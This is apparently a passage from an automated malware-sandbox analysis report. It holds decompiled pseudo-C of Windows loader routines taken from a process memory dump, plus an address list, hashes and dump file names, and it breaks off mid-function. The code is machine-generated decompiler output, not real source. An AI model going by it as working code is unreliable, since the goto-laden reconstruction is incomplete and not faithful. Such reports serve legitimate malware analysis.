				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x50bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04FD6600(0x50b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x50b7b9c; // 0x0
							_t281 = L04FE4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0500F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x50b7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x50b7b8c; // 0x32029d0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04FE2280(_t200, 0x50b84d8);
									_t277 =  *0x50b85f4; // 0x3203218
									_t351 =  *0x50b85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x32031b0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04FDFFB0(_t287, _t353, 0x50b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0501CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04FD6600(0x50b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04FD7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x50bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0504E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x50b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x50bb218; // 0x0
														asm("ror edi, cl");
														 *0x50bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04FE2280(_t250, 0x50b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L05003898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04FDFFB0(_t293, _t353, 0x50b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E050037F5(_t353, 0);
																}
																E05000413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04FF9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04FF02D6(_t174);
																}
																L04FE77F0( *0x50b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04FFC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04FDEC7F(_t353);
										L04FF19B8(_t287, 0, _t353, 0);
										_t200 = E04FCF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0500B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x50bb2f8; // 0xce0000
									if((_t206 |  *0x50bb2fc) == 0 || ( *0x50bb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x50bb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E05076B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E05076AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04FDE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04FDEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E05009730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04FDE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04FD8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E05003C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x04fdd5f2
0x04fdd5f5
0x04fdd5f5
0x04fdd5fd
0x04fdd600
0x04fdd60a
0x04fdd60d
0x04fdd617
0x04fdd61d
0x04fdd627
0x04fdd62e
0x04fdd911
0x04fdd913
0x00000000
0x04fdd919
0x04fdd919
0x04fdd919
0x04fdd634
0x04fdd634
0x04fdd634
0x04fdd634
0x04fdd640
0x04fdd8bf
0x00000000
0x04fdd646
0x04fdd646
0x04fdd64d
0x04fdd652
0x0502b2fc
0x0502b2fc
0x0502b302
0x0502b33b
0x0502b341
0x00000000
0x0502b304
0x0502b304
0x0502b319
0x0502b31e
0x0502b324
0x0502b326
0x0502b332
0x0502b347
0x0502b34c
0x0502b351
0x0502b35a
0x00000000
0x0502b328
0x0502b328
0x00000000
0x0502b328
0x0502b326
0x04fdd658
0x04fdd658
0x04fdd65b
0x04fdd665
0x00000000
0x04fdd66b
0x04fdd66b
0x04fdd66b
0x04fdd66b
0x04fdd66d
0x04fdd672
0x04fdd67a
0x00000000
0x00000000
0x04fdd680
0x04fdd686
0x04fdd8ce
0x04fdd8d4
0x04fdd8dd
0x04fdd8e0
0x04fdd68c
0x04fdd691
0x04fdd69d
0x04fdd6a2
0x04fdd6a7
0x04fdd6b0
0x04fdd6b5
0x04fdd6e0
0x04fdd6b7
0x04fdd6b7
0x04fdd6b9
0x04fdd6b9
0x04fdd6bb
0x04fdd6bd
0x04fdd6ce
0x04fdd6d0
0x04fdd6d2
0x0502b363
0x0502b365
0x00000000
0x0502b36b
0x00000000
0x0502b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04fdd6bf
0x04fdd6bf
0x04fdd6e5
0x04fdd6e7
0x04fdd6e9
0x04fdd6ec
0x04fdd6ec
0x04fdd6ef
0x04fdd6f5
0x04fdd6f9
0x04fdd6fb
0x04fdd6fd
0x04fdd701
0x04fdd703
0x04fdd70a
0x04fdd70a
0x04fdd701
0x04fdd710
0x04fdd710
0x04fdd6c1
0x04fdd6c1
0x04fdd6c6
0x0502b36d
0x0502b36f
0x00000000
0x0502b375
0x0502b375
0x0502b375
0x00000000
0x0502b375
0x00000000
0x04fdd6cc
0x04fdd6d8
0x04fdd6d8
0x04fdd6d8
0x00000000
0x04fdd6c6
0x04fdd6bf
0x00000000
0x04fdd6da
0x04fdd6da
0x04fdd716
0x04fdd71b
0x04fdd720
0x04fdd726
0x04fdd726
0x04fdd72d
0x00000000
0x04fdd733
0x04fdd739
0x04fdd742
0x04fdd750
0x04fdd758
0x04fdd764
0x04fdd776
0x04fdd77a
0x04fdd783
0x04fdd928
0x04fdd92c
0x04fdd93d
0x04fdd944
0x04fdd94f
0x04fdd954
0x04fdd956
0x04fdd95f
0x04fdd961
0x04fdd973
0x04fdd973
0x04fdd956
0x04fdd944
0x04fdd92c
0x04fdd78b
0x0502b394
0x04fdd791
0x04fdd798
0x0502b3a3
0x0502b3bb
0x0502b3bb
0x04fdd7a5
0x04fdd866
0x04fdd870
0x04fdd884
0x04fdd892
0x04fdd898
0x04fdd89e
0x04fdd8a0
0x04fdd8a6
0x04fdd8ac
0x04fdd8ae
0x04fdd8b4
0x04fdd8b4
0x04fdd8ae
0x04fdd7a5
0x04fdd78b
0x04fdd7b1
0x0502b3c5
0x0502b3c5
0x04fdd7c3
0x04fdd7ca
0x04fdd7e5
0x04fdd7eb
0x04fdd8eb
0x04fdd8ed
0x00000000
0x04fdd8f3
0x04fdd8f3
0x04fdd8f3
0x00000000
0x04fdd8ed
0x04fdd7cc
0x04fdd7cc
0x04fdd7d2
0x00000000
0x04fdd7d4
0x04fdd7d4
0x04fdd7d7
0x04fdd7df
0x0502b3d4
0x0502b3d9
0x0502b3dc
0x0502b3dc
0x0502b3df
0x0502b3e2
0x0502b468
0x0502b46d
0x0502b46f
0x0502b46f
0x0502b475
0x04fdd8f8
0x04fdd8f9
0x04fdd8fd
0x0502b3e8
0x0502b3e8
0x0502b3eb
0x0502b3ed
0x00000000
0x0502b3ef
0x0502b3ef
0x0502b3f1
0x0502b3f4
0x0502b3fe
0x0502b404
0x0502b409
0x0502b40e
0x0502b410
0x0502b410
0x0502b414
0x0502b414
0x0502b41b
0x0502b420
0x0502b423
0x0502b425
0x0502b427
0x0502b42a
0x0502b42d
0x0502b42d
0x0502b42a
0x0502b432
0x0502b436
0x0502b438
0x0502b43b
0x0502b43b
0x0502b449
0x0502b44e
0x0502b454
0x0502b458
0x0502b458
0x0502b45d
0x00000000
0x0502b45d
0x0502b3ed
0x00000000
0x00000000
0x00000000
0x04fdd7df
0x04fdd7d2
0x04fdd7ca
0x0502b37c
0x0502b37e
0x0502b385
0x0502b38a
0x00000000
0x0502b38a
0x04fdd742
0x04fdd7f1
0x04fdd7f8
0x0502b49b
0x0502b49b
0x04fdd800
0x04fdd837
0x04fdd843
0x04fdd845
0x04fdd847
0x04fdd84a
0x04fdd84b
0x04fdd84e
0x04fdd857
0x04fdd802
0x04fdd802
0x04fdd80d
0x00000000
0x04fdd818
0x04fdd818
0x04fdd824
0x04fdd831
0x0502b4a5
0x0502b4ab
0x0502b4b3
0x0502b4b8
0x0502b4bb
0x00000000
0x0502b4c1
0x0502b4c1
0x0502b4c8
0x00000000
0x0502b4ce
0x0502b4d4
0x0502b4e1
0x0502b4e3
0x0502b4e5
0x00000000
0x0502b4eb
0x0502b4f0
0x0502b4f2
0x04fddac9
0x04fddacc
0x04fddacf
0x04fddad1
0x04fddd78
0x04fddd78
0x04fddcf2
0x00000000
0x04fddad7
0x04fddad9
0x04fddadb
0x00000000
0x00000000
0x04fddae1
0x04fddae1
0x04fddae4
0x04fddae6
0x0502b4f9
0x0502b4f9
0x0502b500
0x04fddaec
0x04fddaec
0x04fddaf5
0x04fddaf8
0x04fddafb
0x04fddb03
0x04fddb11
0x04fddb16
0x04fddb19
0x04fddb1b
0x0502b52c
0x0502b531
0x0502b534
0x04fddb21
0x04fddb21
0x04fddb24
0x04fddcd9
0x04fddce2
0x04fddce5
0x04fddd6a
0x04fddd6d
0x00000000
0x04fddd73
0x0502b51a
0x0502b51c
0x0502b51f
0x0502b524
0x00000000
0x0502b524
0x04fddce7
0x04fddce7
0x04fddce7
0x00000000
0x04fddce7
0x00000000
0x04fddb2a
0x04fddb2c
0x04fddb31
0x04fddb33
0x04fddb36
0x04fddb39
0x04fddb3b
0x04fddb66
0x04fddb66
0x04fddb3d
0x04fddb3d
0x04fddb3e
0x04fddb46
0x04fddb47
0x04fddb49
0x04fddb4c
0x04fddb53
0x04fddb55
0x04fddb58
0x04fddb5a
0x0502b50a
0x0502b50f
0x0502b512
0x04fddb60
0x04fddb60
0x04fddb63
0x04fddb63
0x00000000
0x04fddb63
0x04fddb5a
0x04fddb3b
0x04fddb24
0x04fddb69
0x04fddb69
0x04fddb6c
0x04fddb6f
0x04fddb74
0x0502b557
0x0502b557
0x0502b55e
0x04fddb7a
0x04fddb7c
0x04fddb7f
0x04fddb82
0x04fddb85
0x00000000
0x04fddb8b
0x04fddb8b
0x04fddb8d
0x04fddb9b
0x04fddb9b
0x04fddb9d
0x04fddba0
0x04fddba2
0x04fddba4
0x04fddba7
0x04fddba9
0x04fddbae
0x04fddbae
0x04fddbb1
0x04fddbb4
0x04fddbb4
0x04fddbb7
0x04fddbba
0x04fddcd2
0x04fddcd4
0x00000000
0x04fddbc0
0x04fddbc0
0x04fddbd2
0x04fddbd7
0x04fddbda
0x04fddbdd
0x04fddbdf
0x00000000
0x04fddbe5
0x04fddbe5
0x04fddbee
0x04fddbf1
0x0502b541
0x0502b544
0x00000000
0x0502b546
0x0502b546
0x00000000
0x0502b546
0x04fddbf7
0x04fddbf7
0x04fddbfd
0x04fddbfd
0x04fddbff
0x04fddc0b
0x04fddc15
0x04fddc1b
0x04fddc1d
0x04fddc21
0x04fddc21
0x04fddc23
0x04fddc23
0x04fddc26
0x04fddc29
0x04fddc2b
0x00000000
0x00000000
0x04fddc31
0x04fddc34
0x04fddc36
0x04fddcbf
0x04fddcbf
0x04fddcc2
0x00000000
0x04fddc3c
0x04fddc41
0x04fddc43
0x00000000
0x04fddc45
0x04fddc45
0x04fddc47
0x00000000
0x04fddc4d
0x04fddc4d
0x04fddc50
0x04fddc52
0x04fddc55
0x04fddcfa
0x04fddcfe
0x04fddd08
0x04fddd0a
0x04fddd0c
0x00000000
0x04fddd12
0x04fddd15
0x04fddd2d
0x04fddd2f
0x04fddd32
0x04fddd35
0x00000000
0x04fddd35
0x04fddc5b
0x04fddc5b
0x04fddc5e
0x04fddc61
0x04fddc64
0x04fddc67
0x04fddc67
0x04fddc6a
0x04fddc6c
0x04fddc8e
0x04fddc8e
0x04fddc91
0x04fddc93
0x04fddcce
0x04fddcce
0x04fddc95
0x04fddc9c
0x04fddc6e
0x04fddc72
0x04fddc75
0x04fddc77
0x04fddc79
0x0502b551
0x0502b551
0x00000000
0x04fddc7f
0x04fddc7f
0x04fddc81
0x00000000
0x04fddc83
0x04fddc86
0x04fddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x04fddc88
0x04fddc81
0x04fddc79
0x04fddc6c
0x04fddc55
0x04fddc47
0x04fddc43
0x00000000
0x04fddc36
0x04fddc23
0x00000000
0x04fddbff
0x04fddbf1
0x04fddbdf
0x04fddb8f
0x04fddb92
0x04fddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x04fddb95
0x04fddb8d
0x04fddb85
0x04fddb74
0x04fddc9f
0x04fddca2
0x04fddcb0
0x04fddcb0
0x04fddad1
0x0502b4e5
0x0502b4c8
0x00000000
0x00000000
0x00000000
0x04fdd831
0x04fdd80d
0x00000000
0x04fdd800
0x0502b47f
0x0502b485
0x00000000
0x0502b485
0x04fdd665
0x04fdd652
0x00000000

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4971d535994c607887fd931e7af3a515b77860143db27ed317df25584b3d24aa
Instruction ID: 111424a52264478bd65750e38242263b8d58a374bf4569cbde963aee1b1167b1
Opcode Fuzzy Hash: 4971d535994c607887fd931e7af3a515b77860143db27ed317df25584b3d24aa
Instruction Fuzzy Hash: BEE19E31B002698FEB35DF28DD84BADB7B6BF45304F0841E9D9099B291DB74B982CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04FD849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04FD849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x509f9c0);
				E0501D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x50b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04FDCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04FE2280( *[fs:0x30], 0x50b8550);
						_t139 =  *0x50b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04FFF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04FDFFB0(_t193, _t235, 0x50b8550);
								L5:
								return E0501D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04FC1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x50b7b9c; // 0x0
							_t235 = L04FE4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x50b7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04FFA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04FDFFB0(_t193, _t235, 0x50b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04FE77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04FE77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x50b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
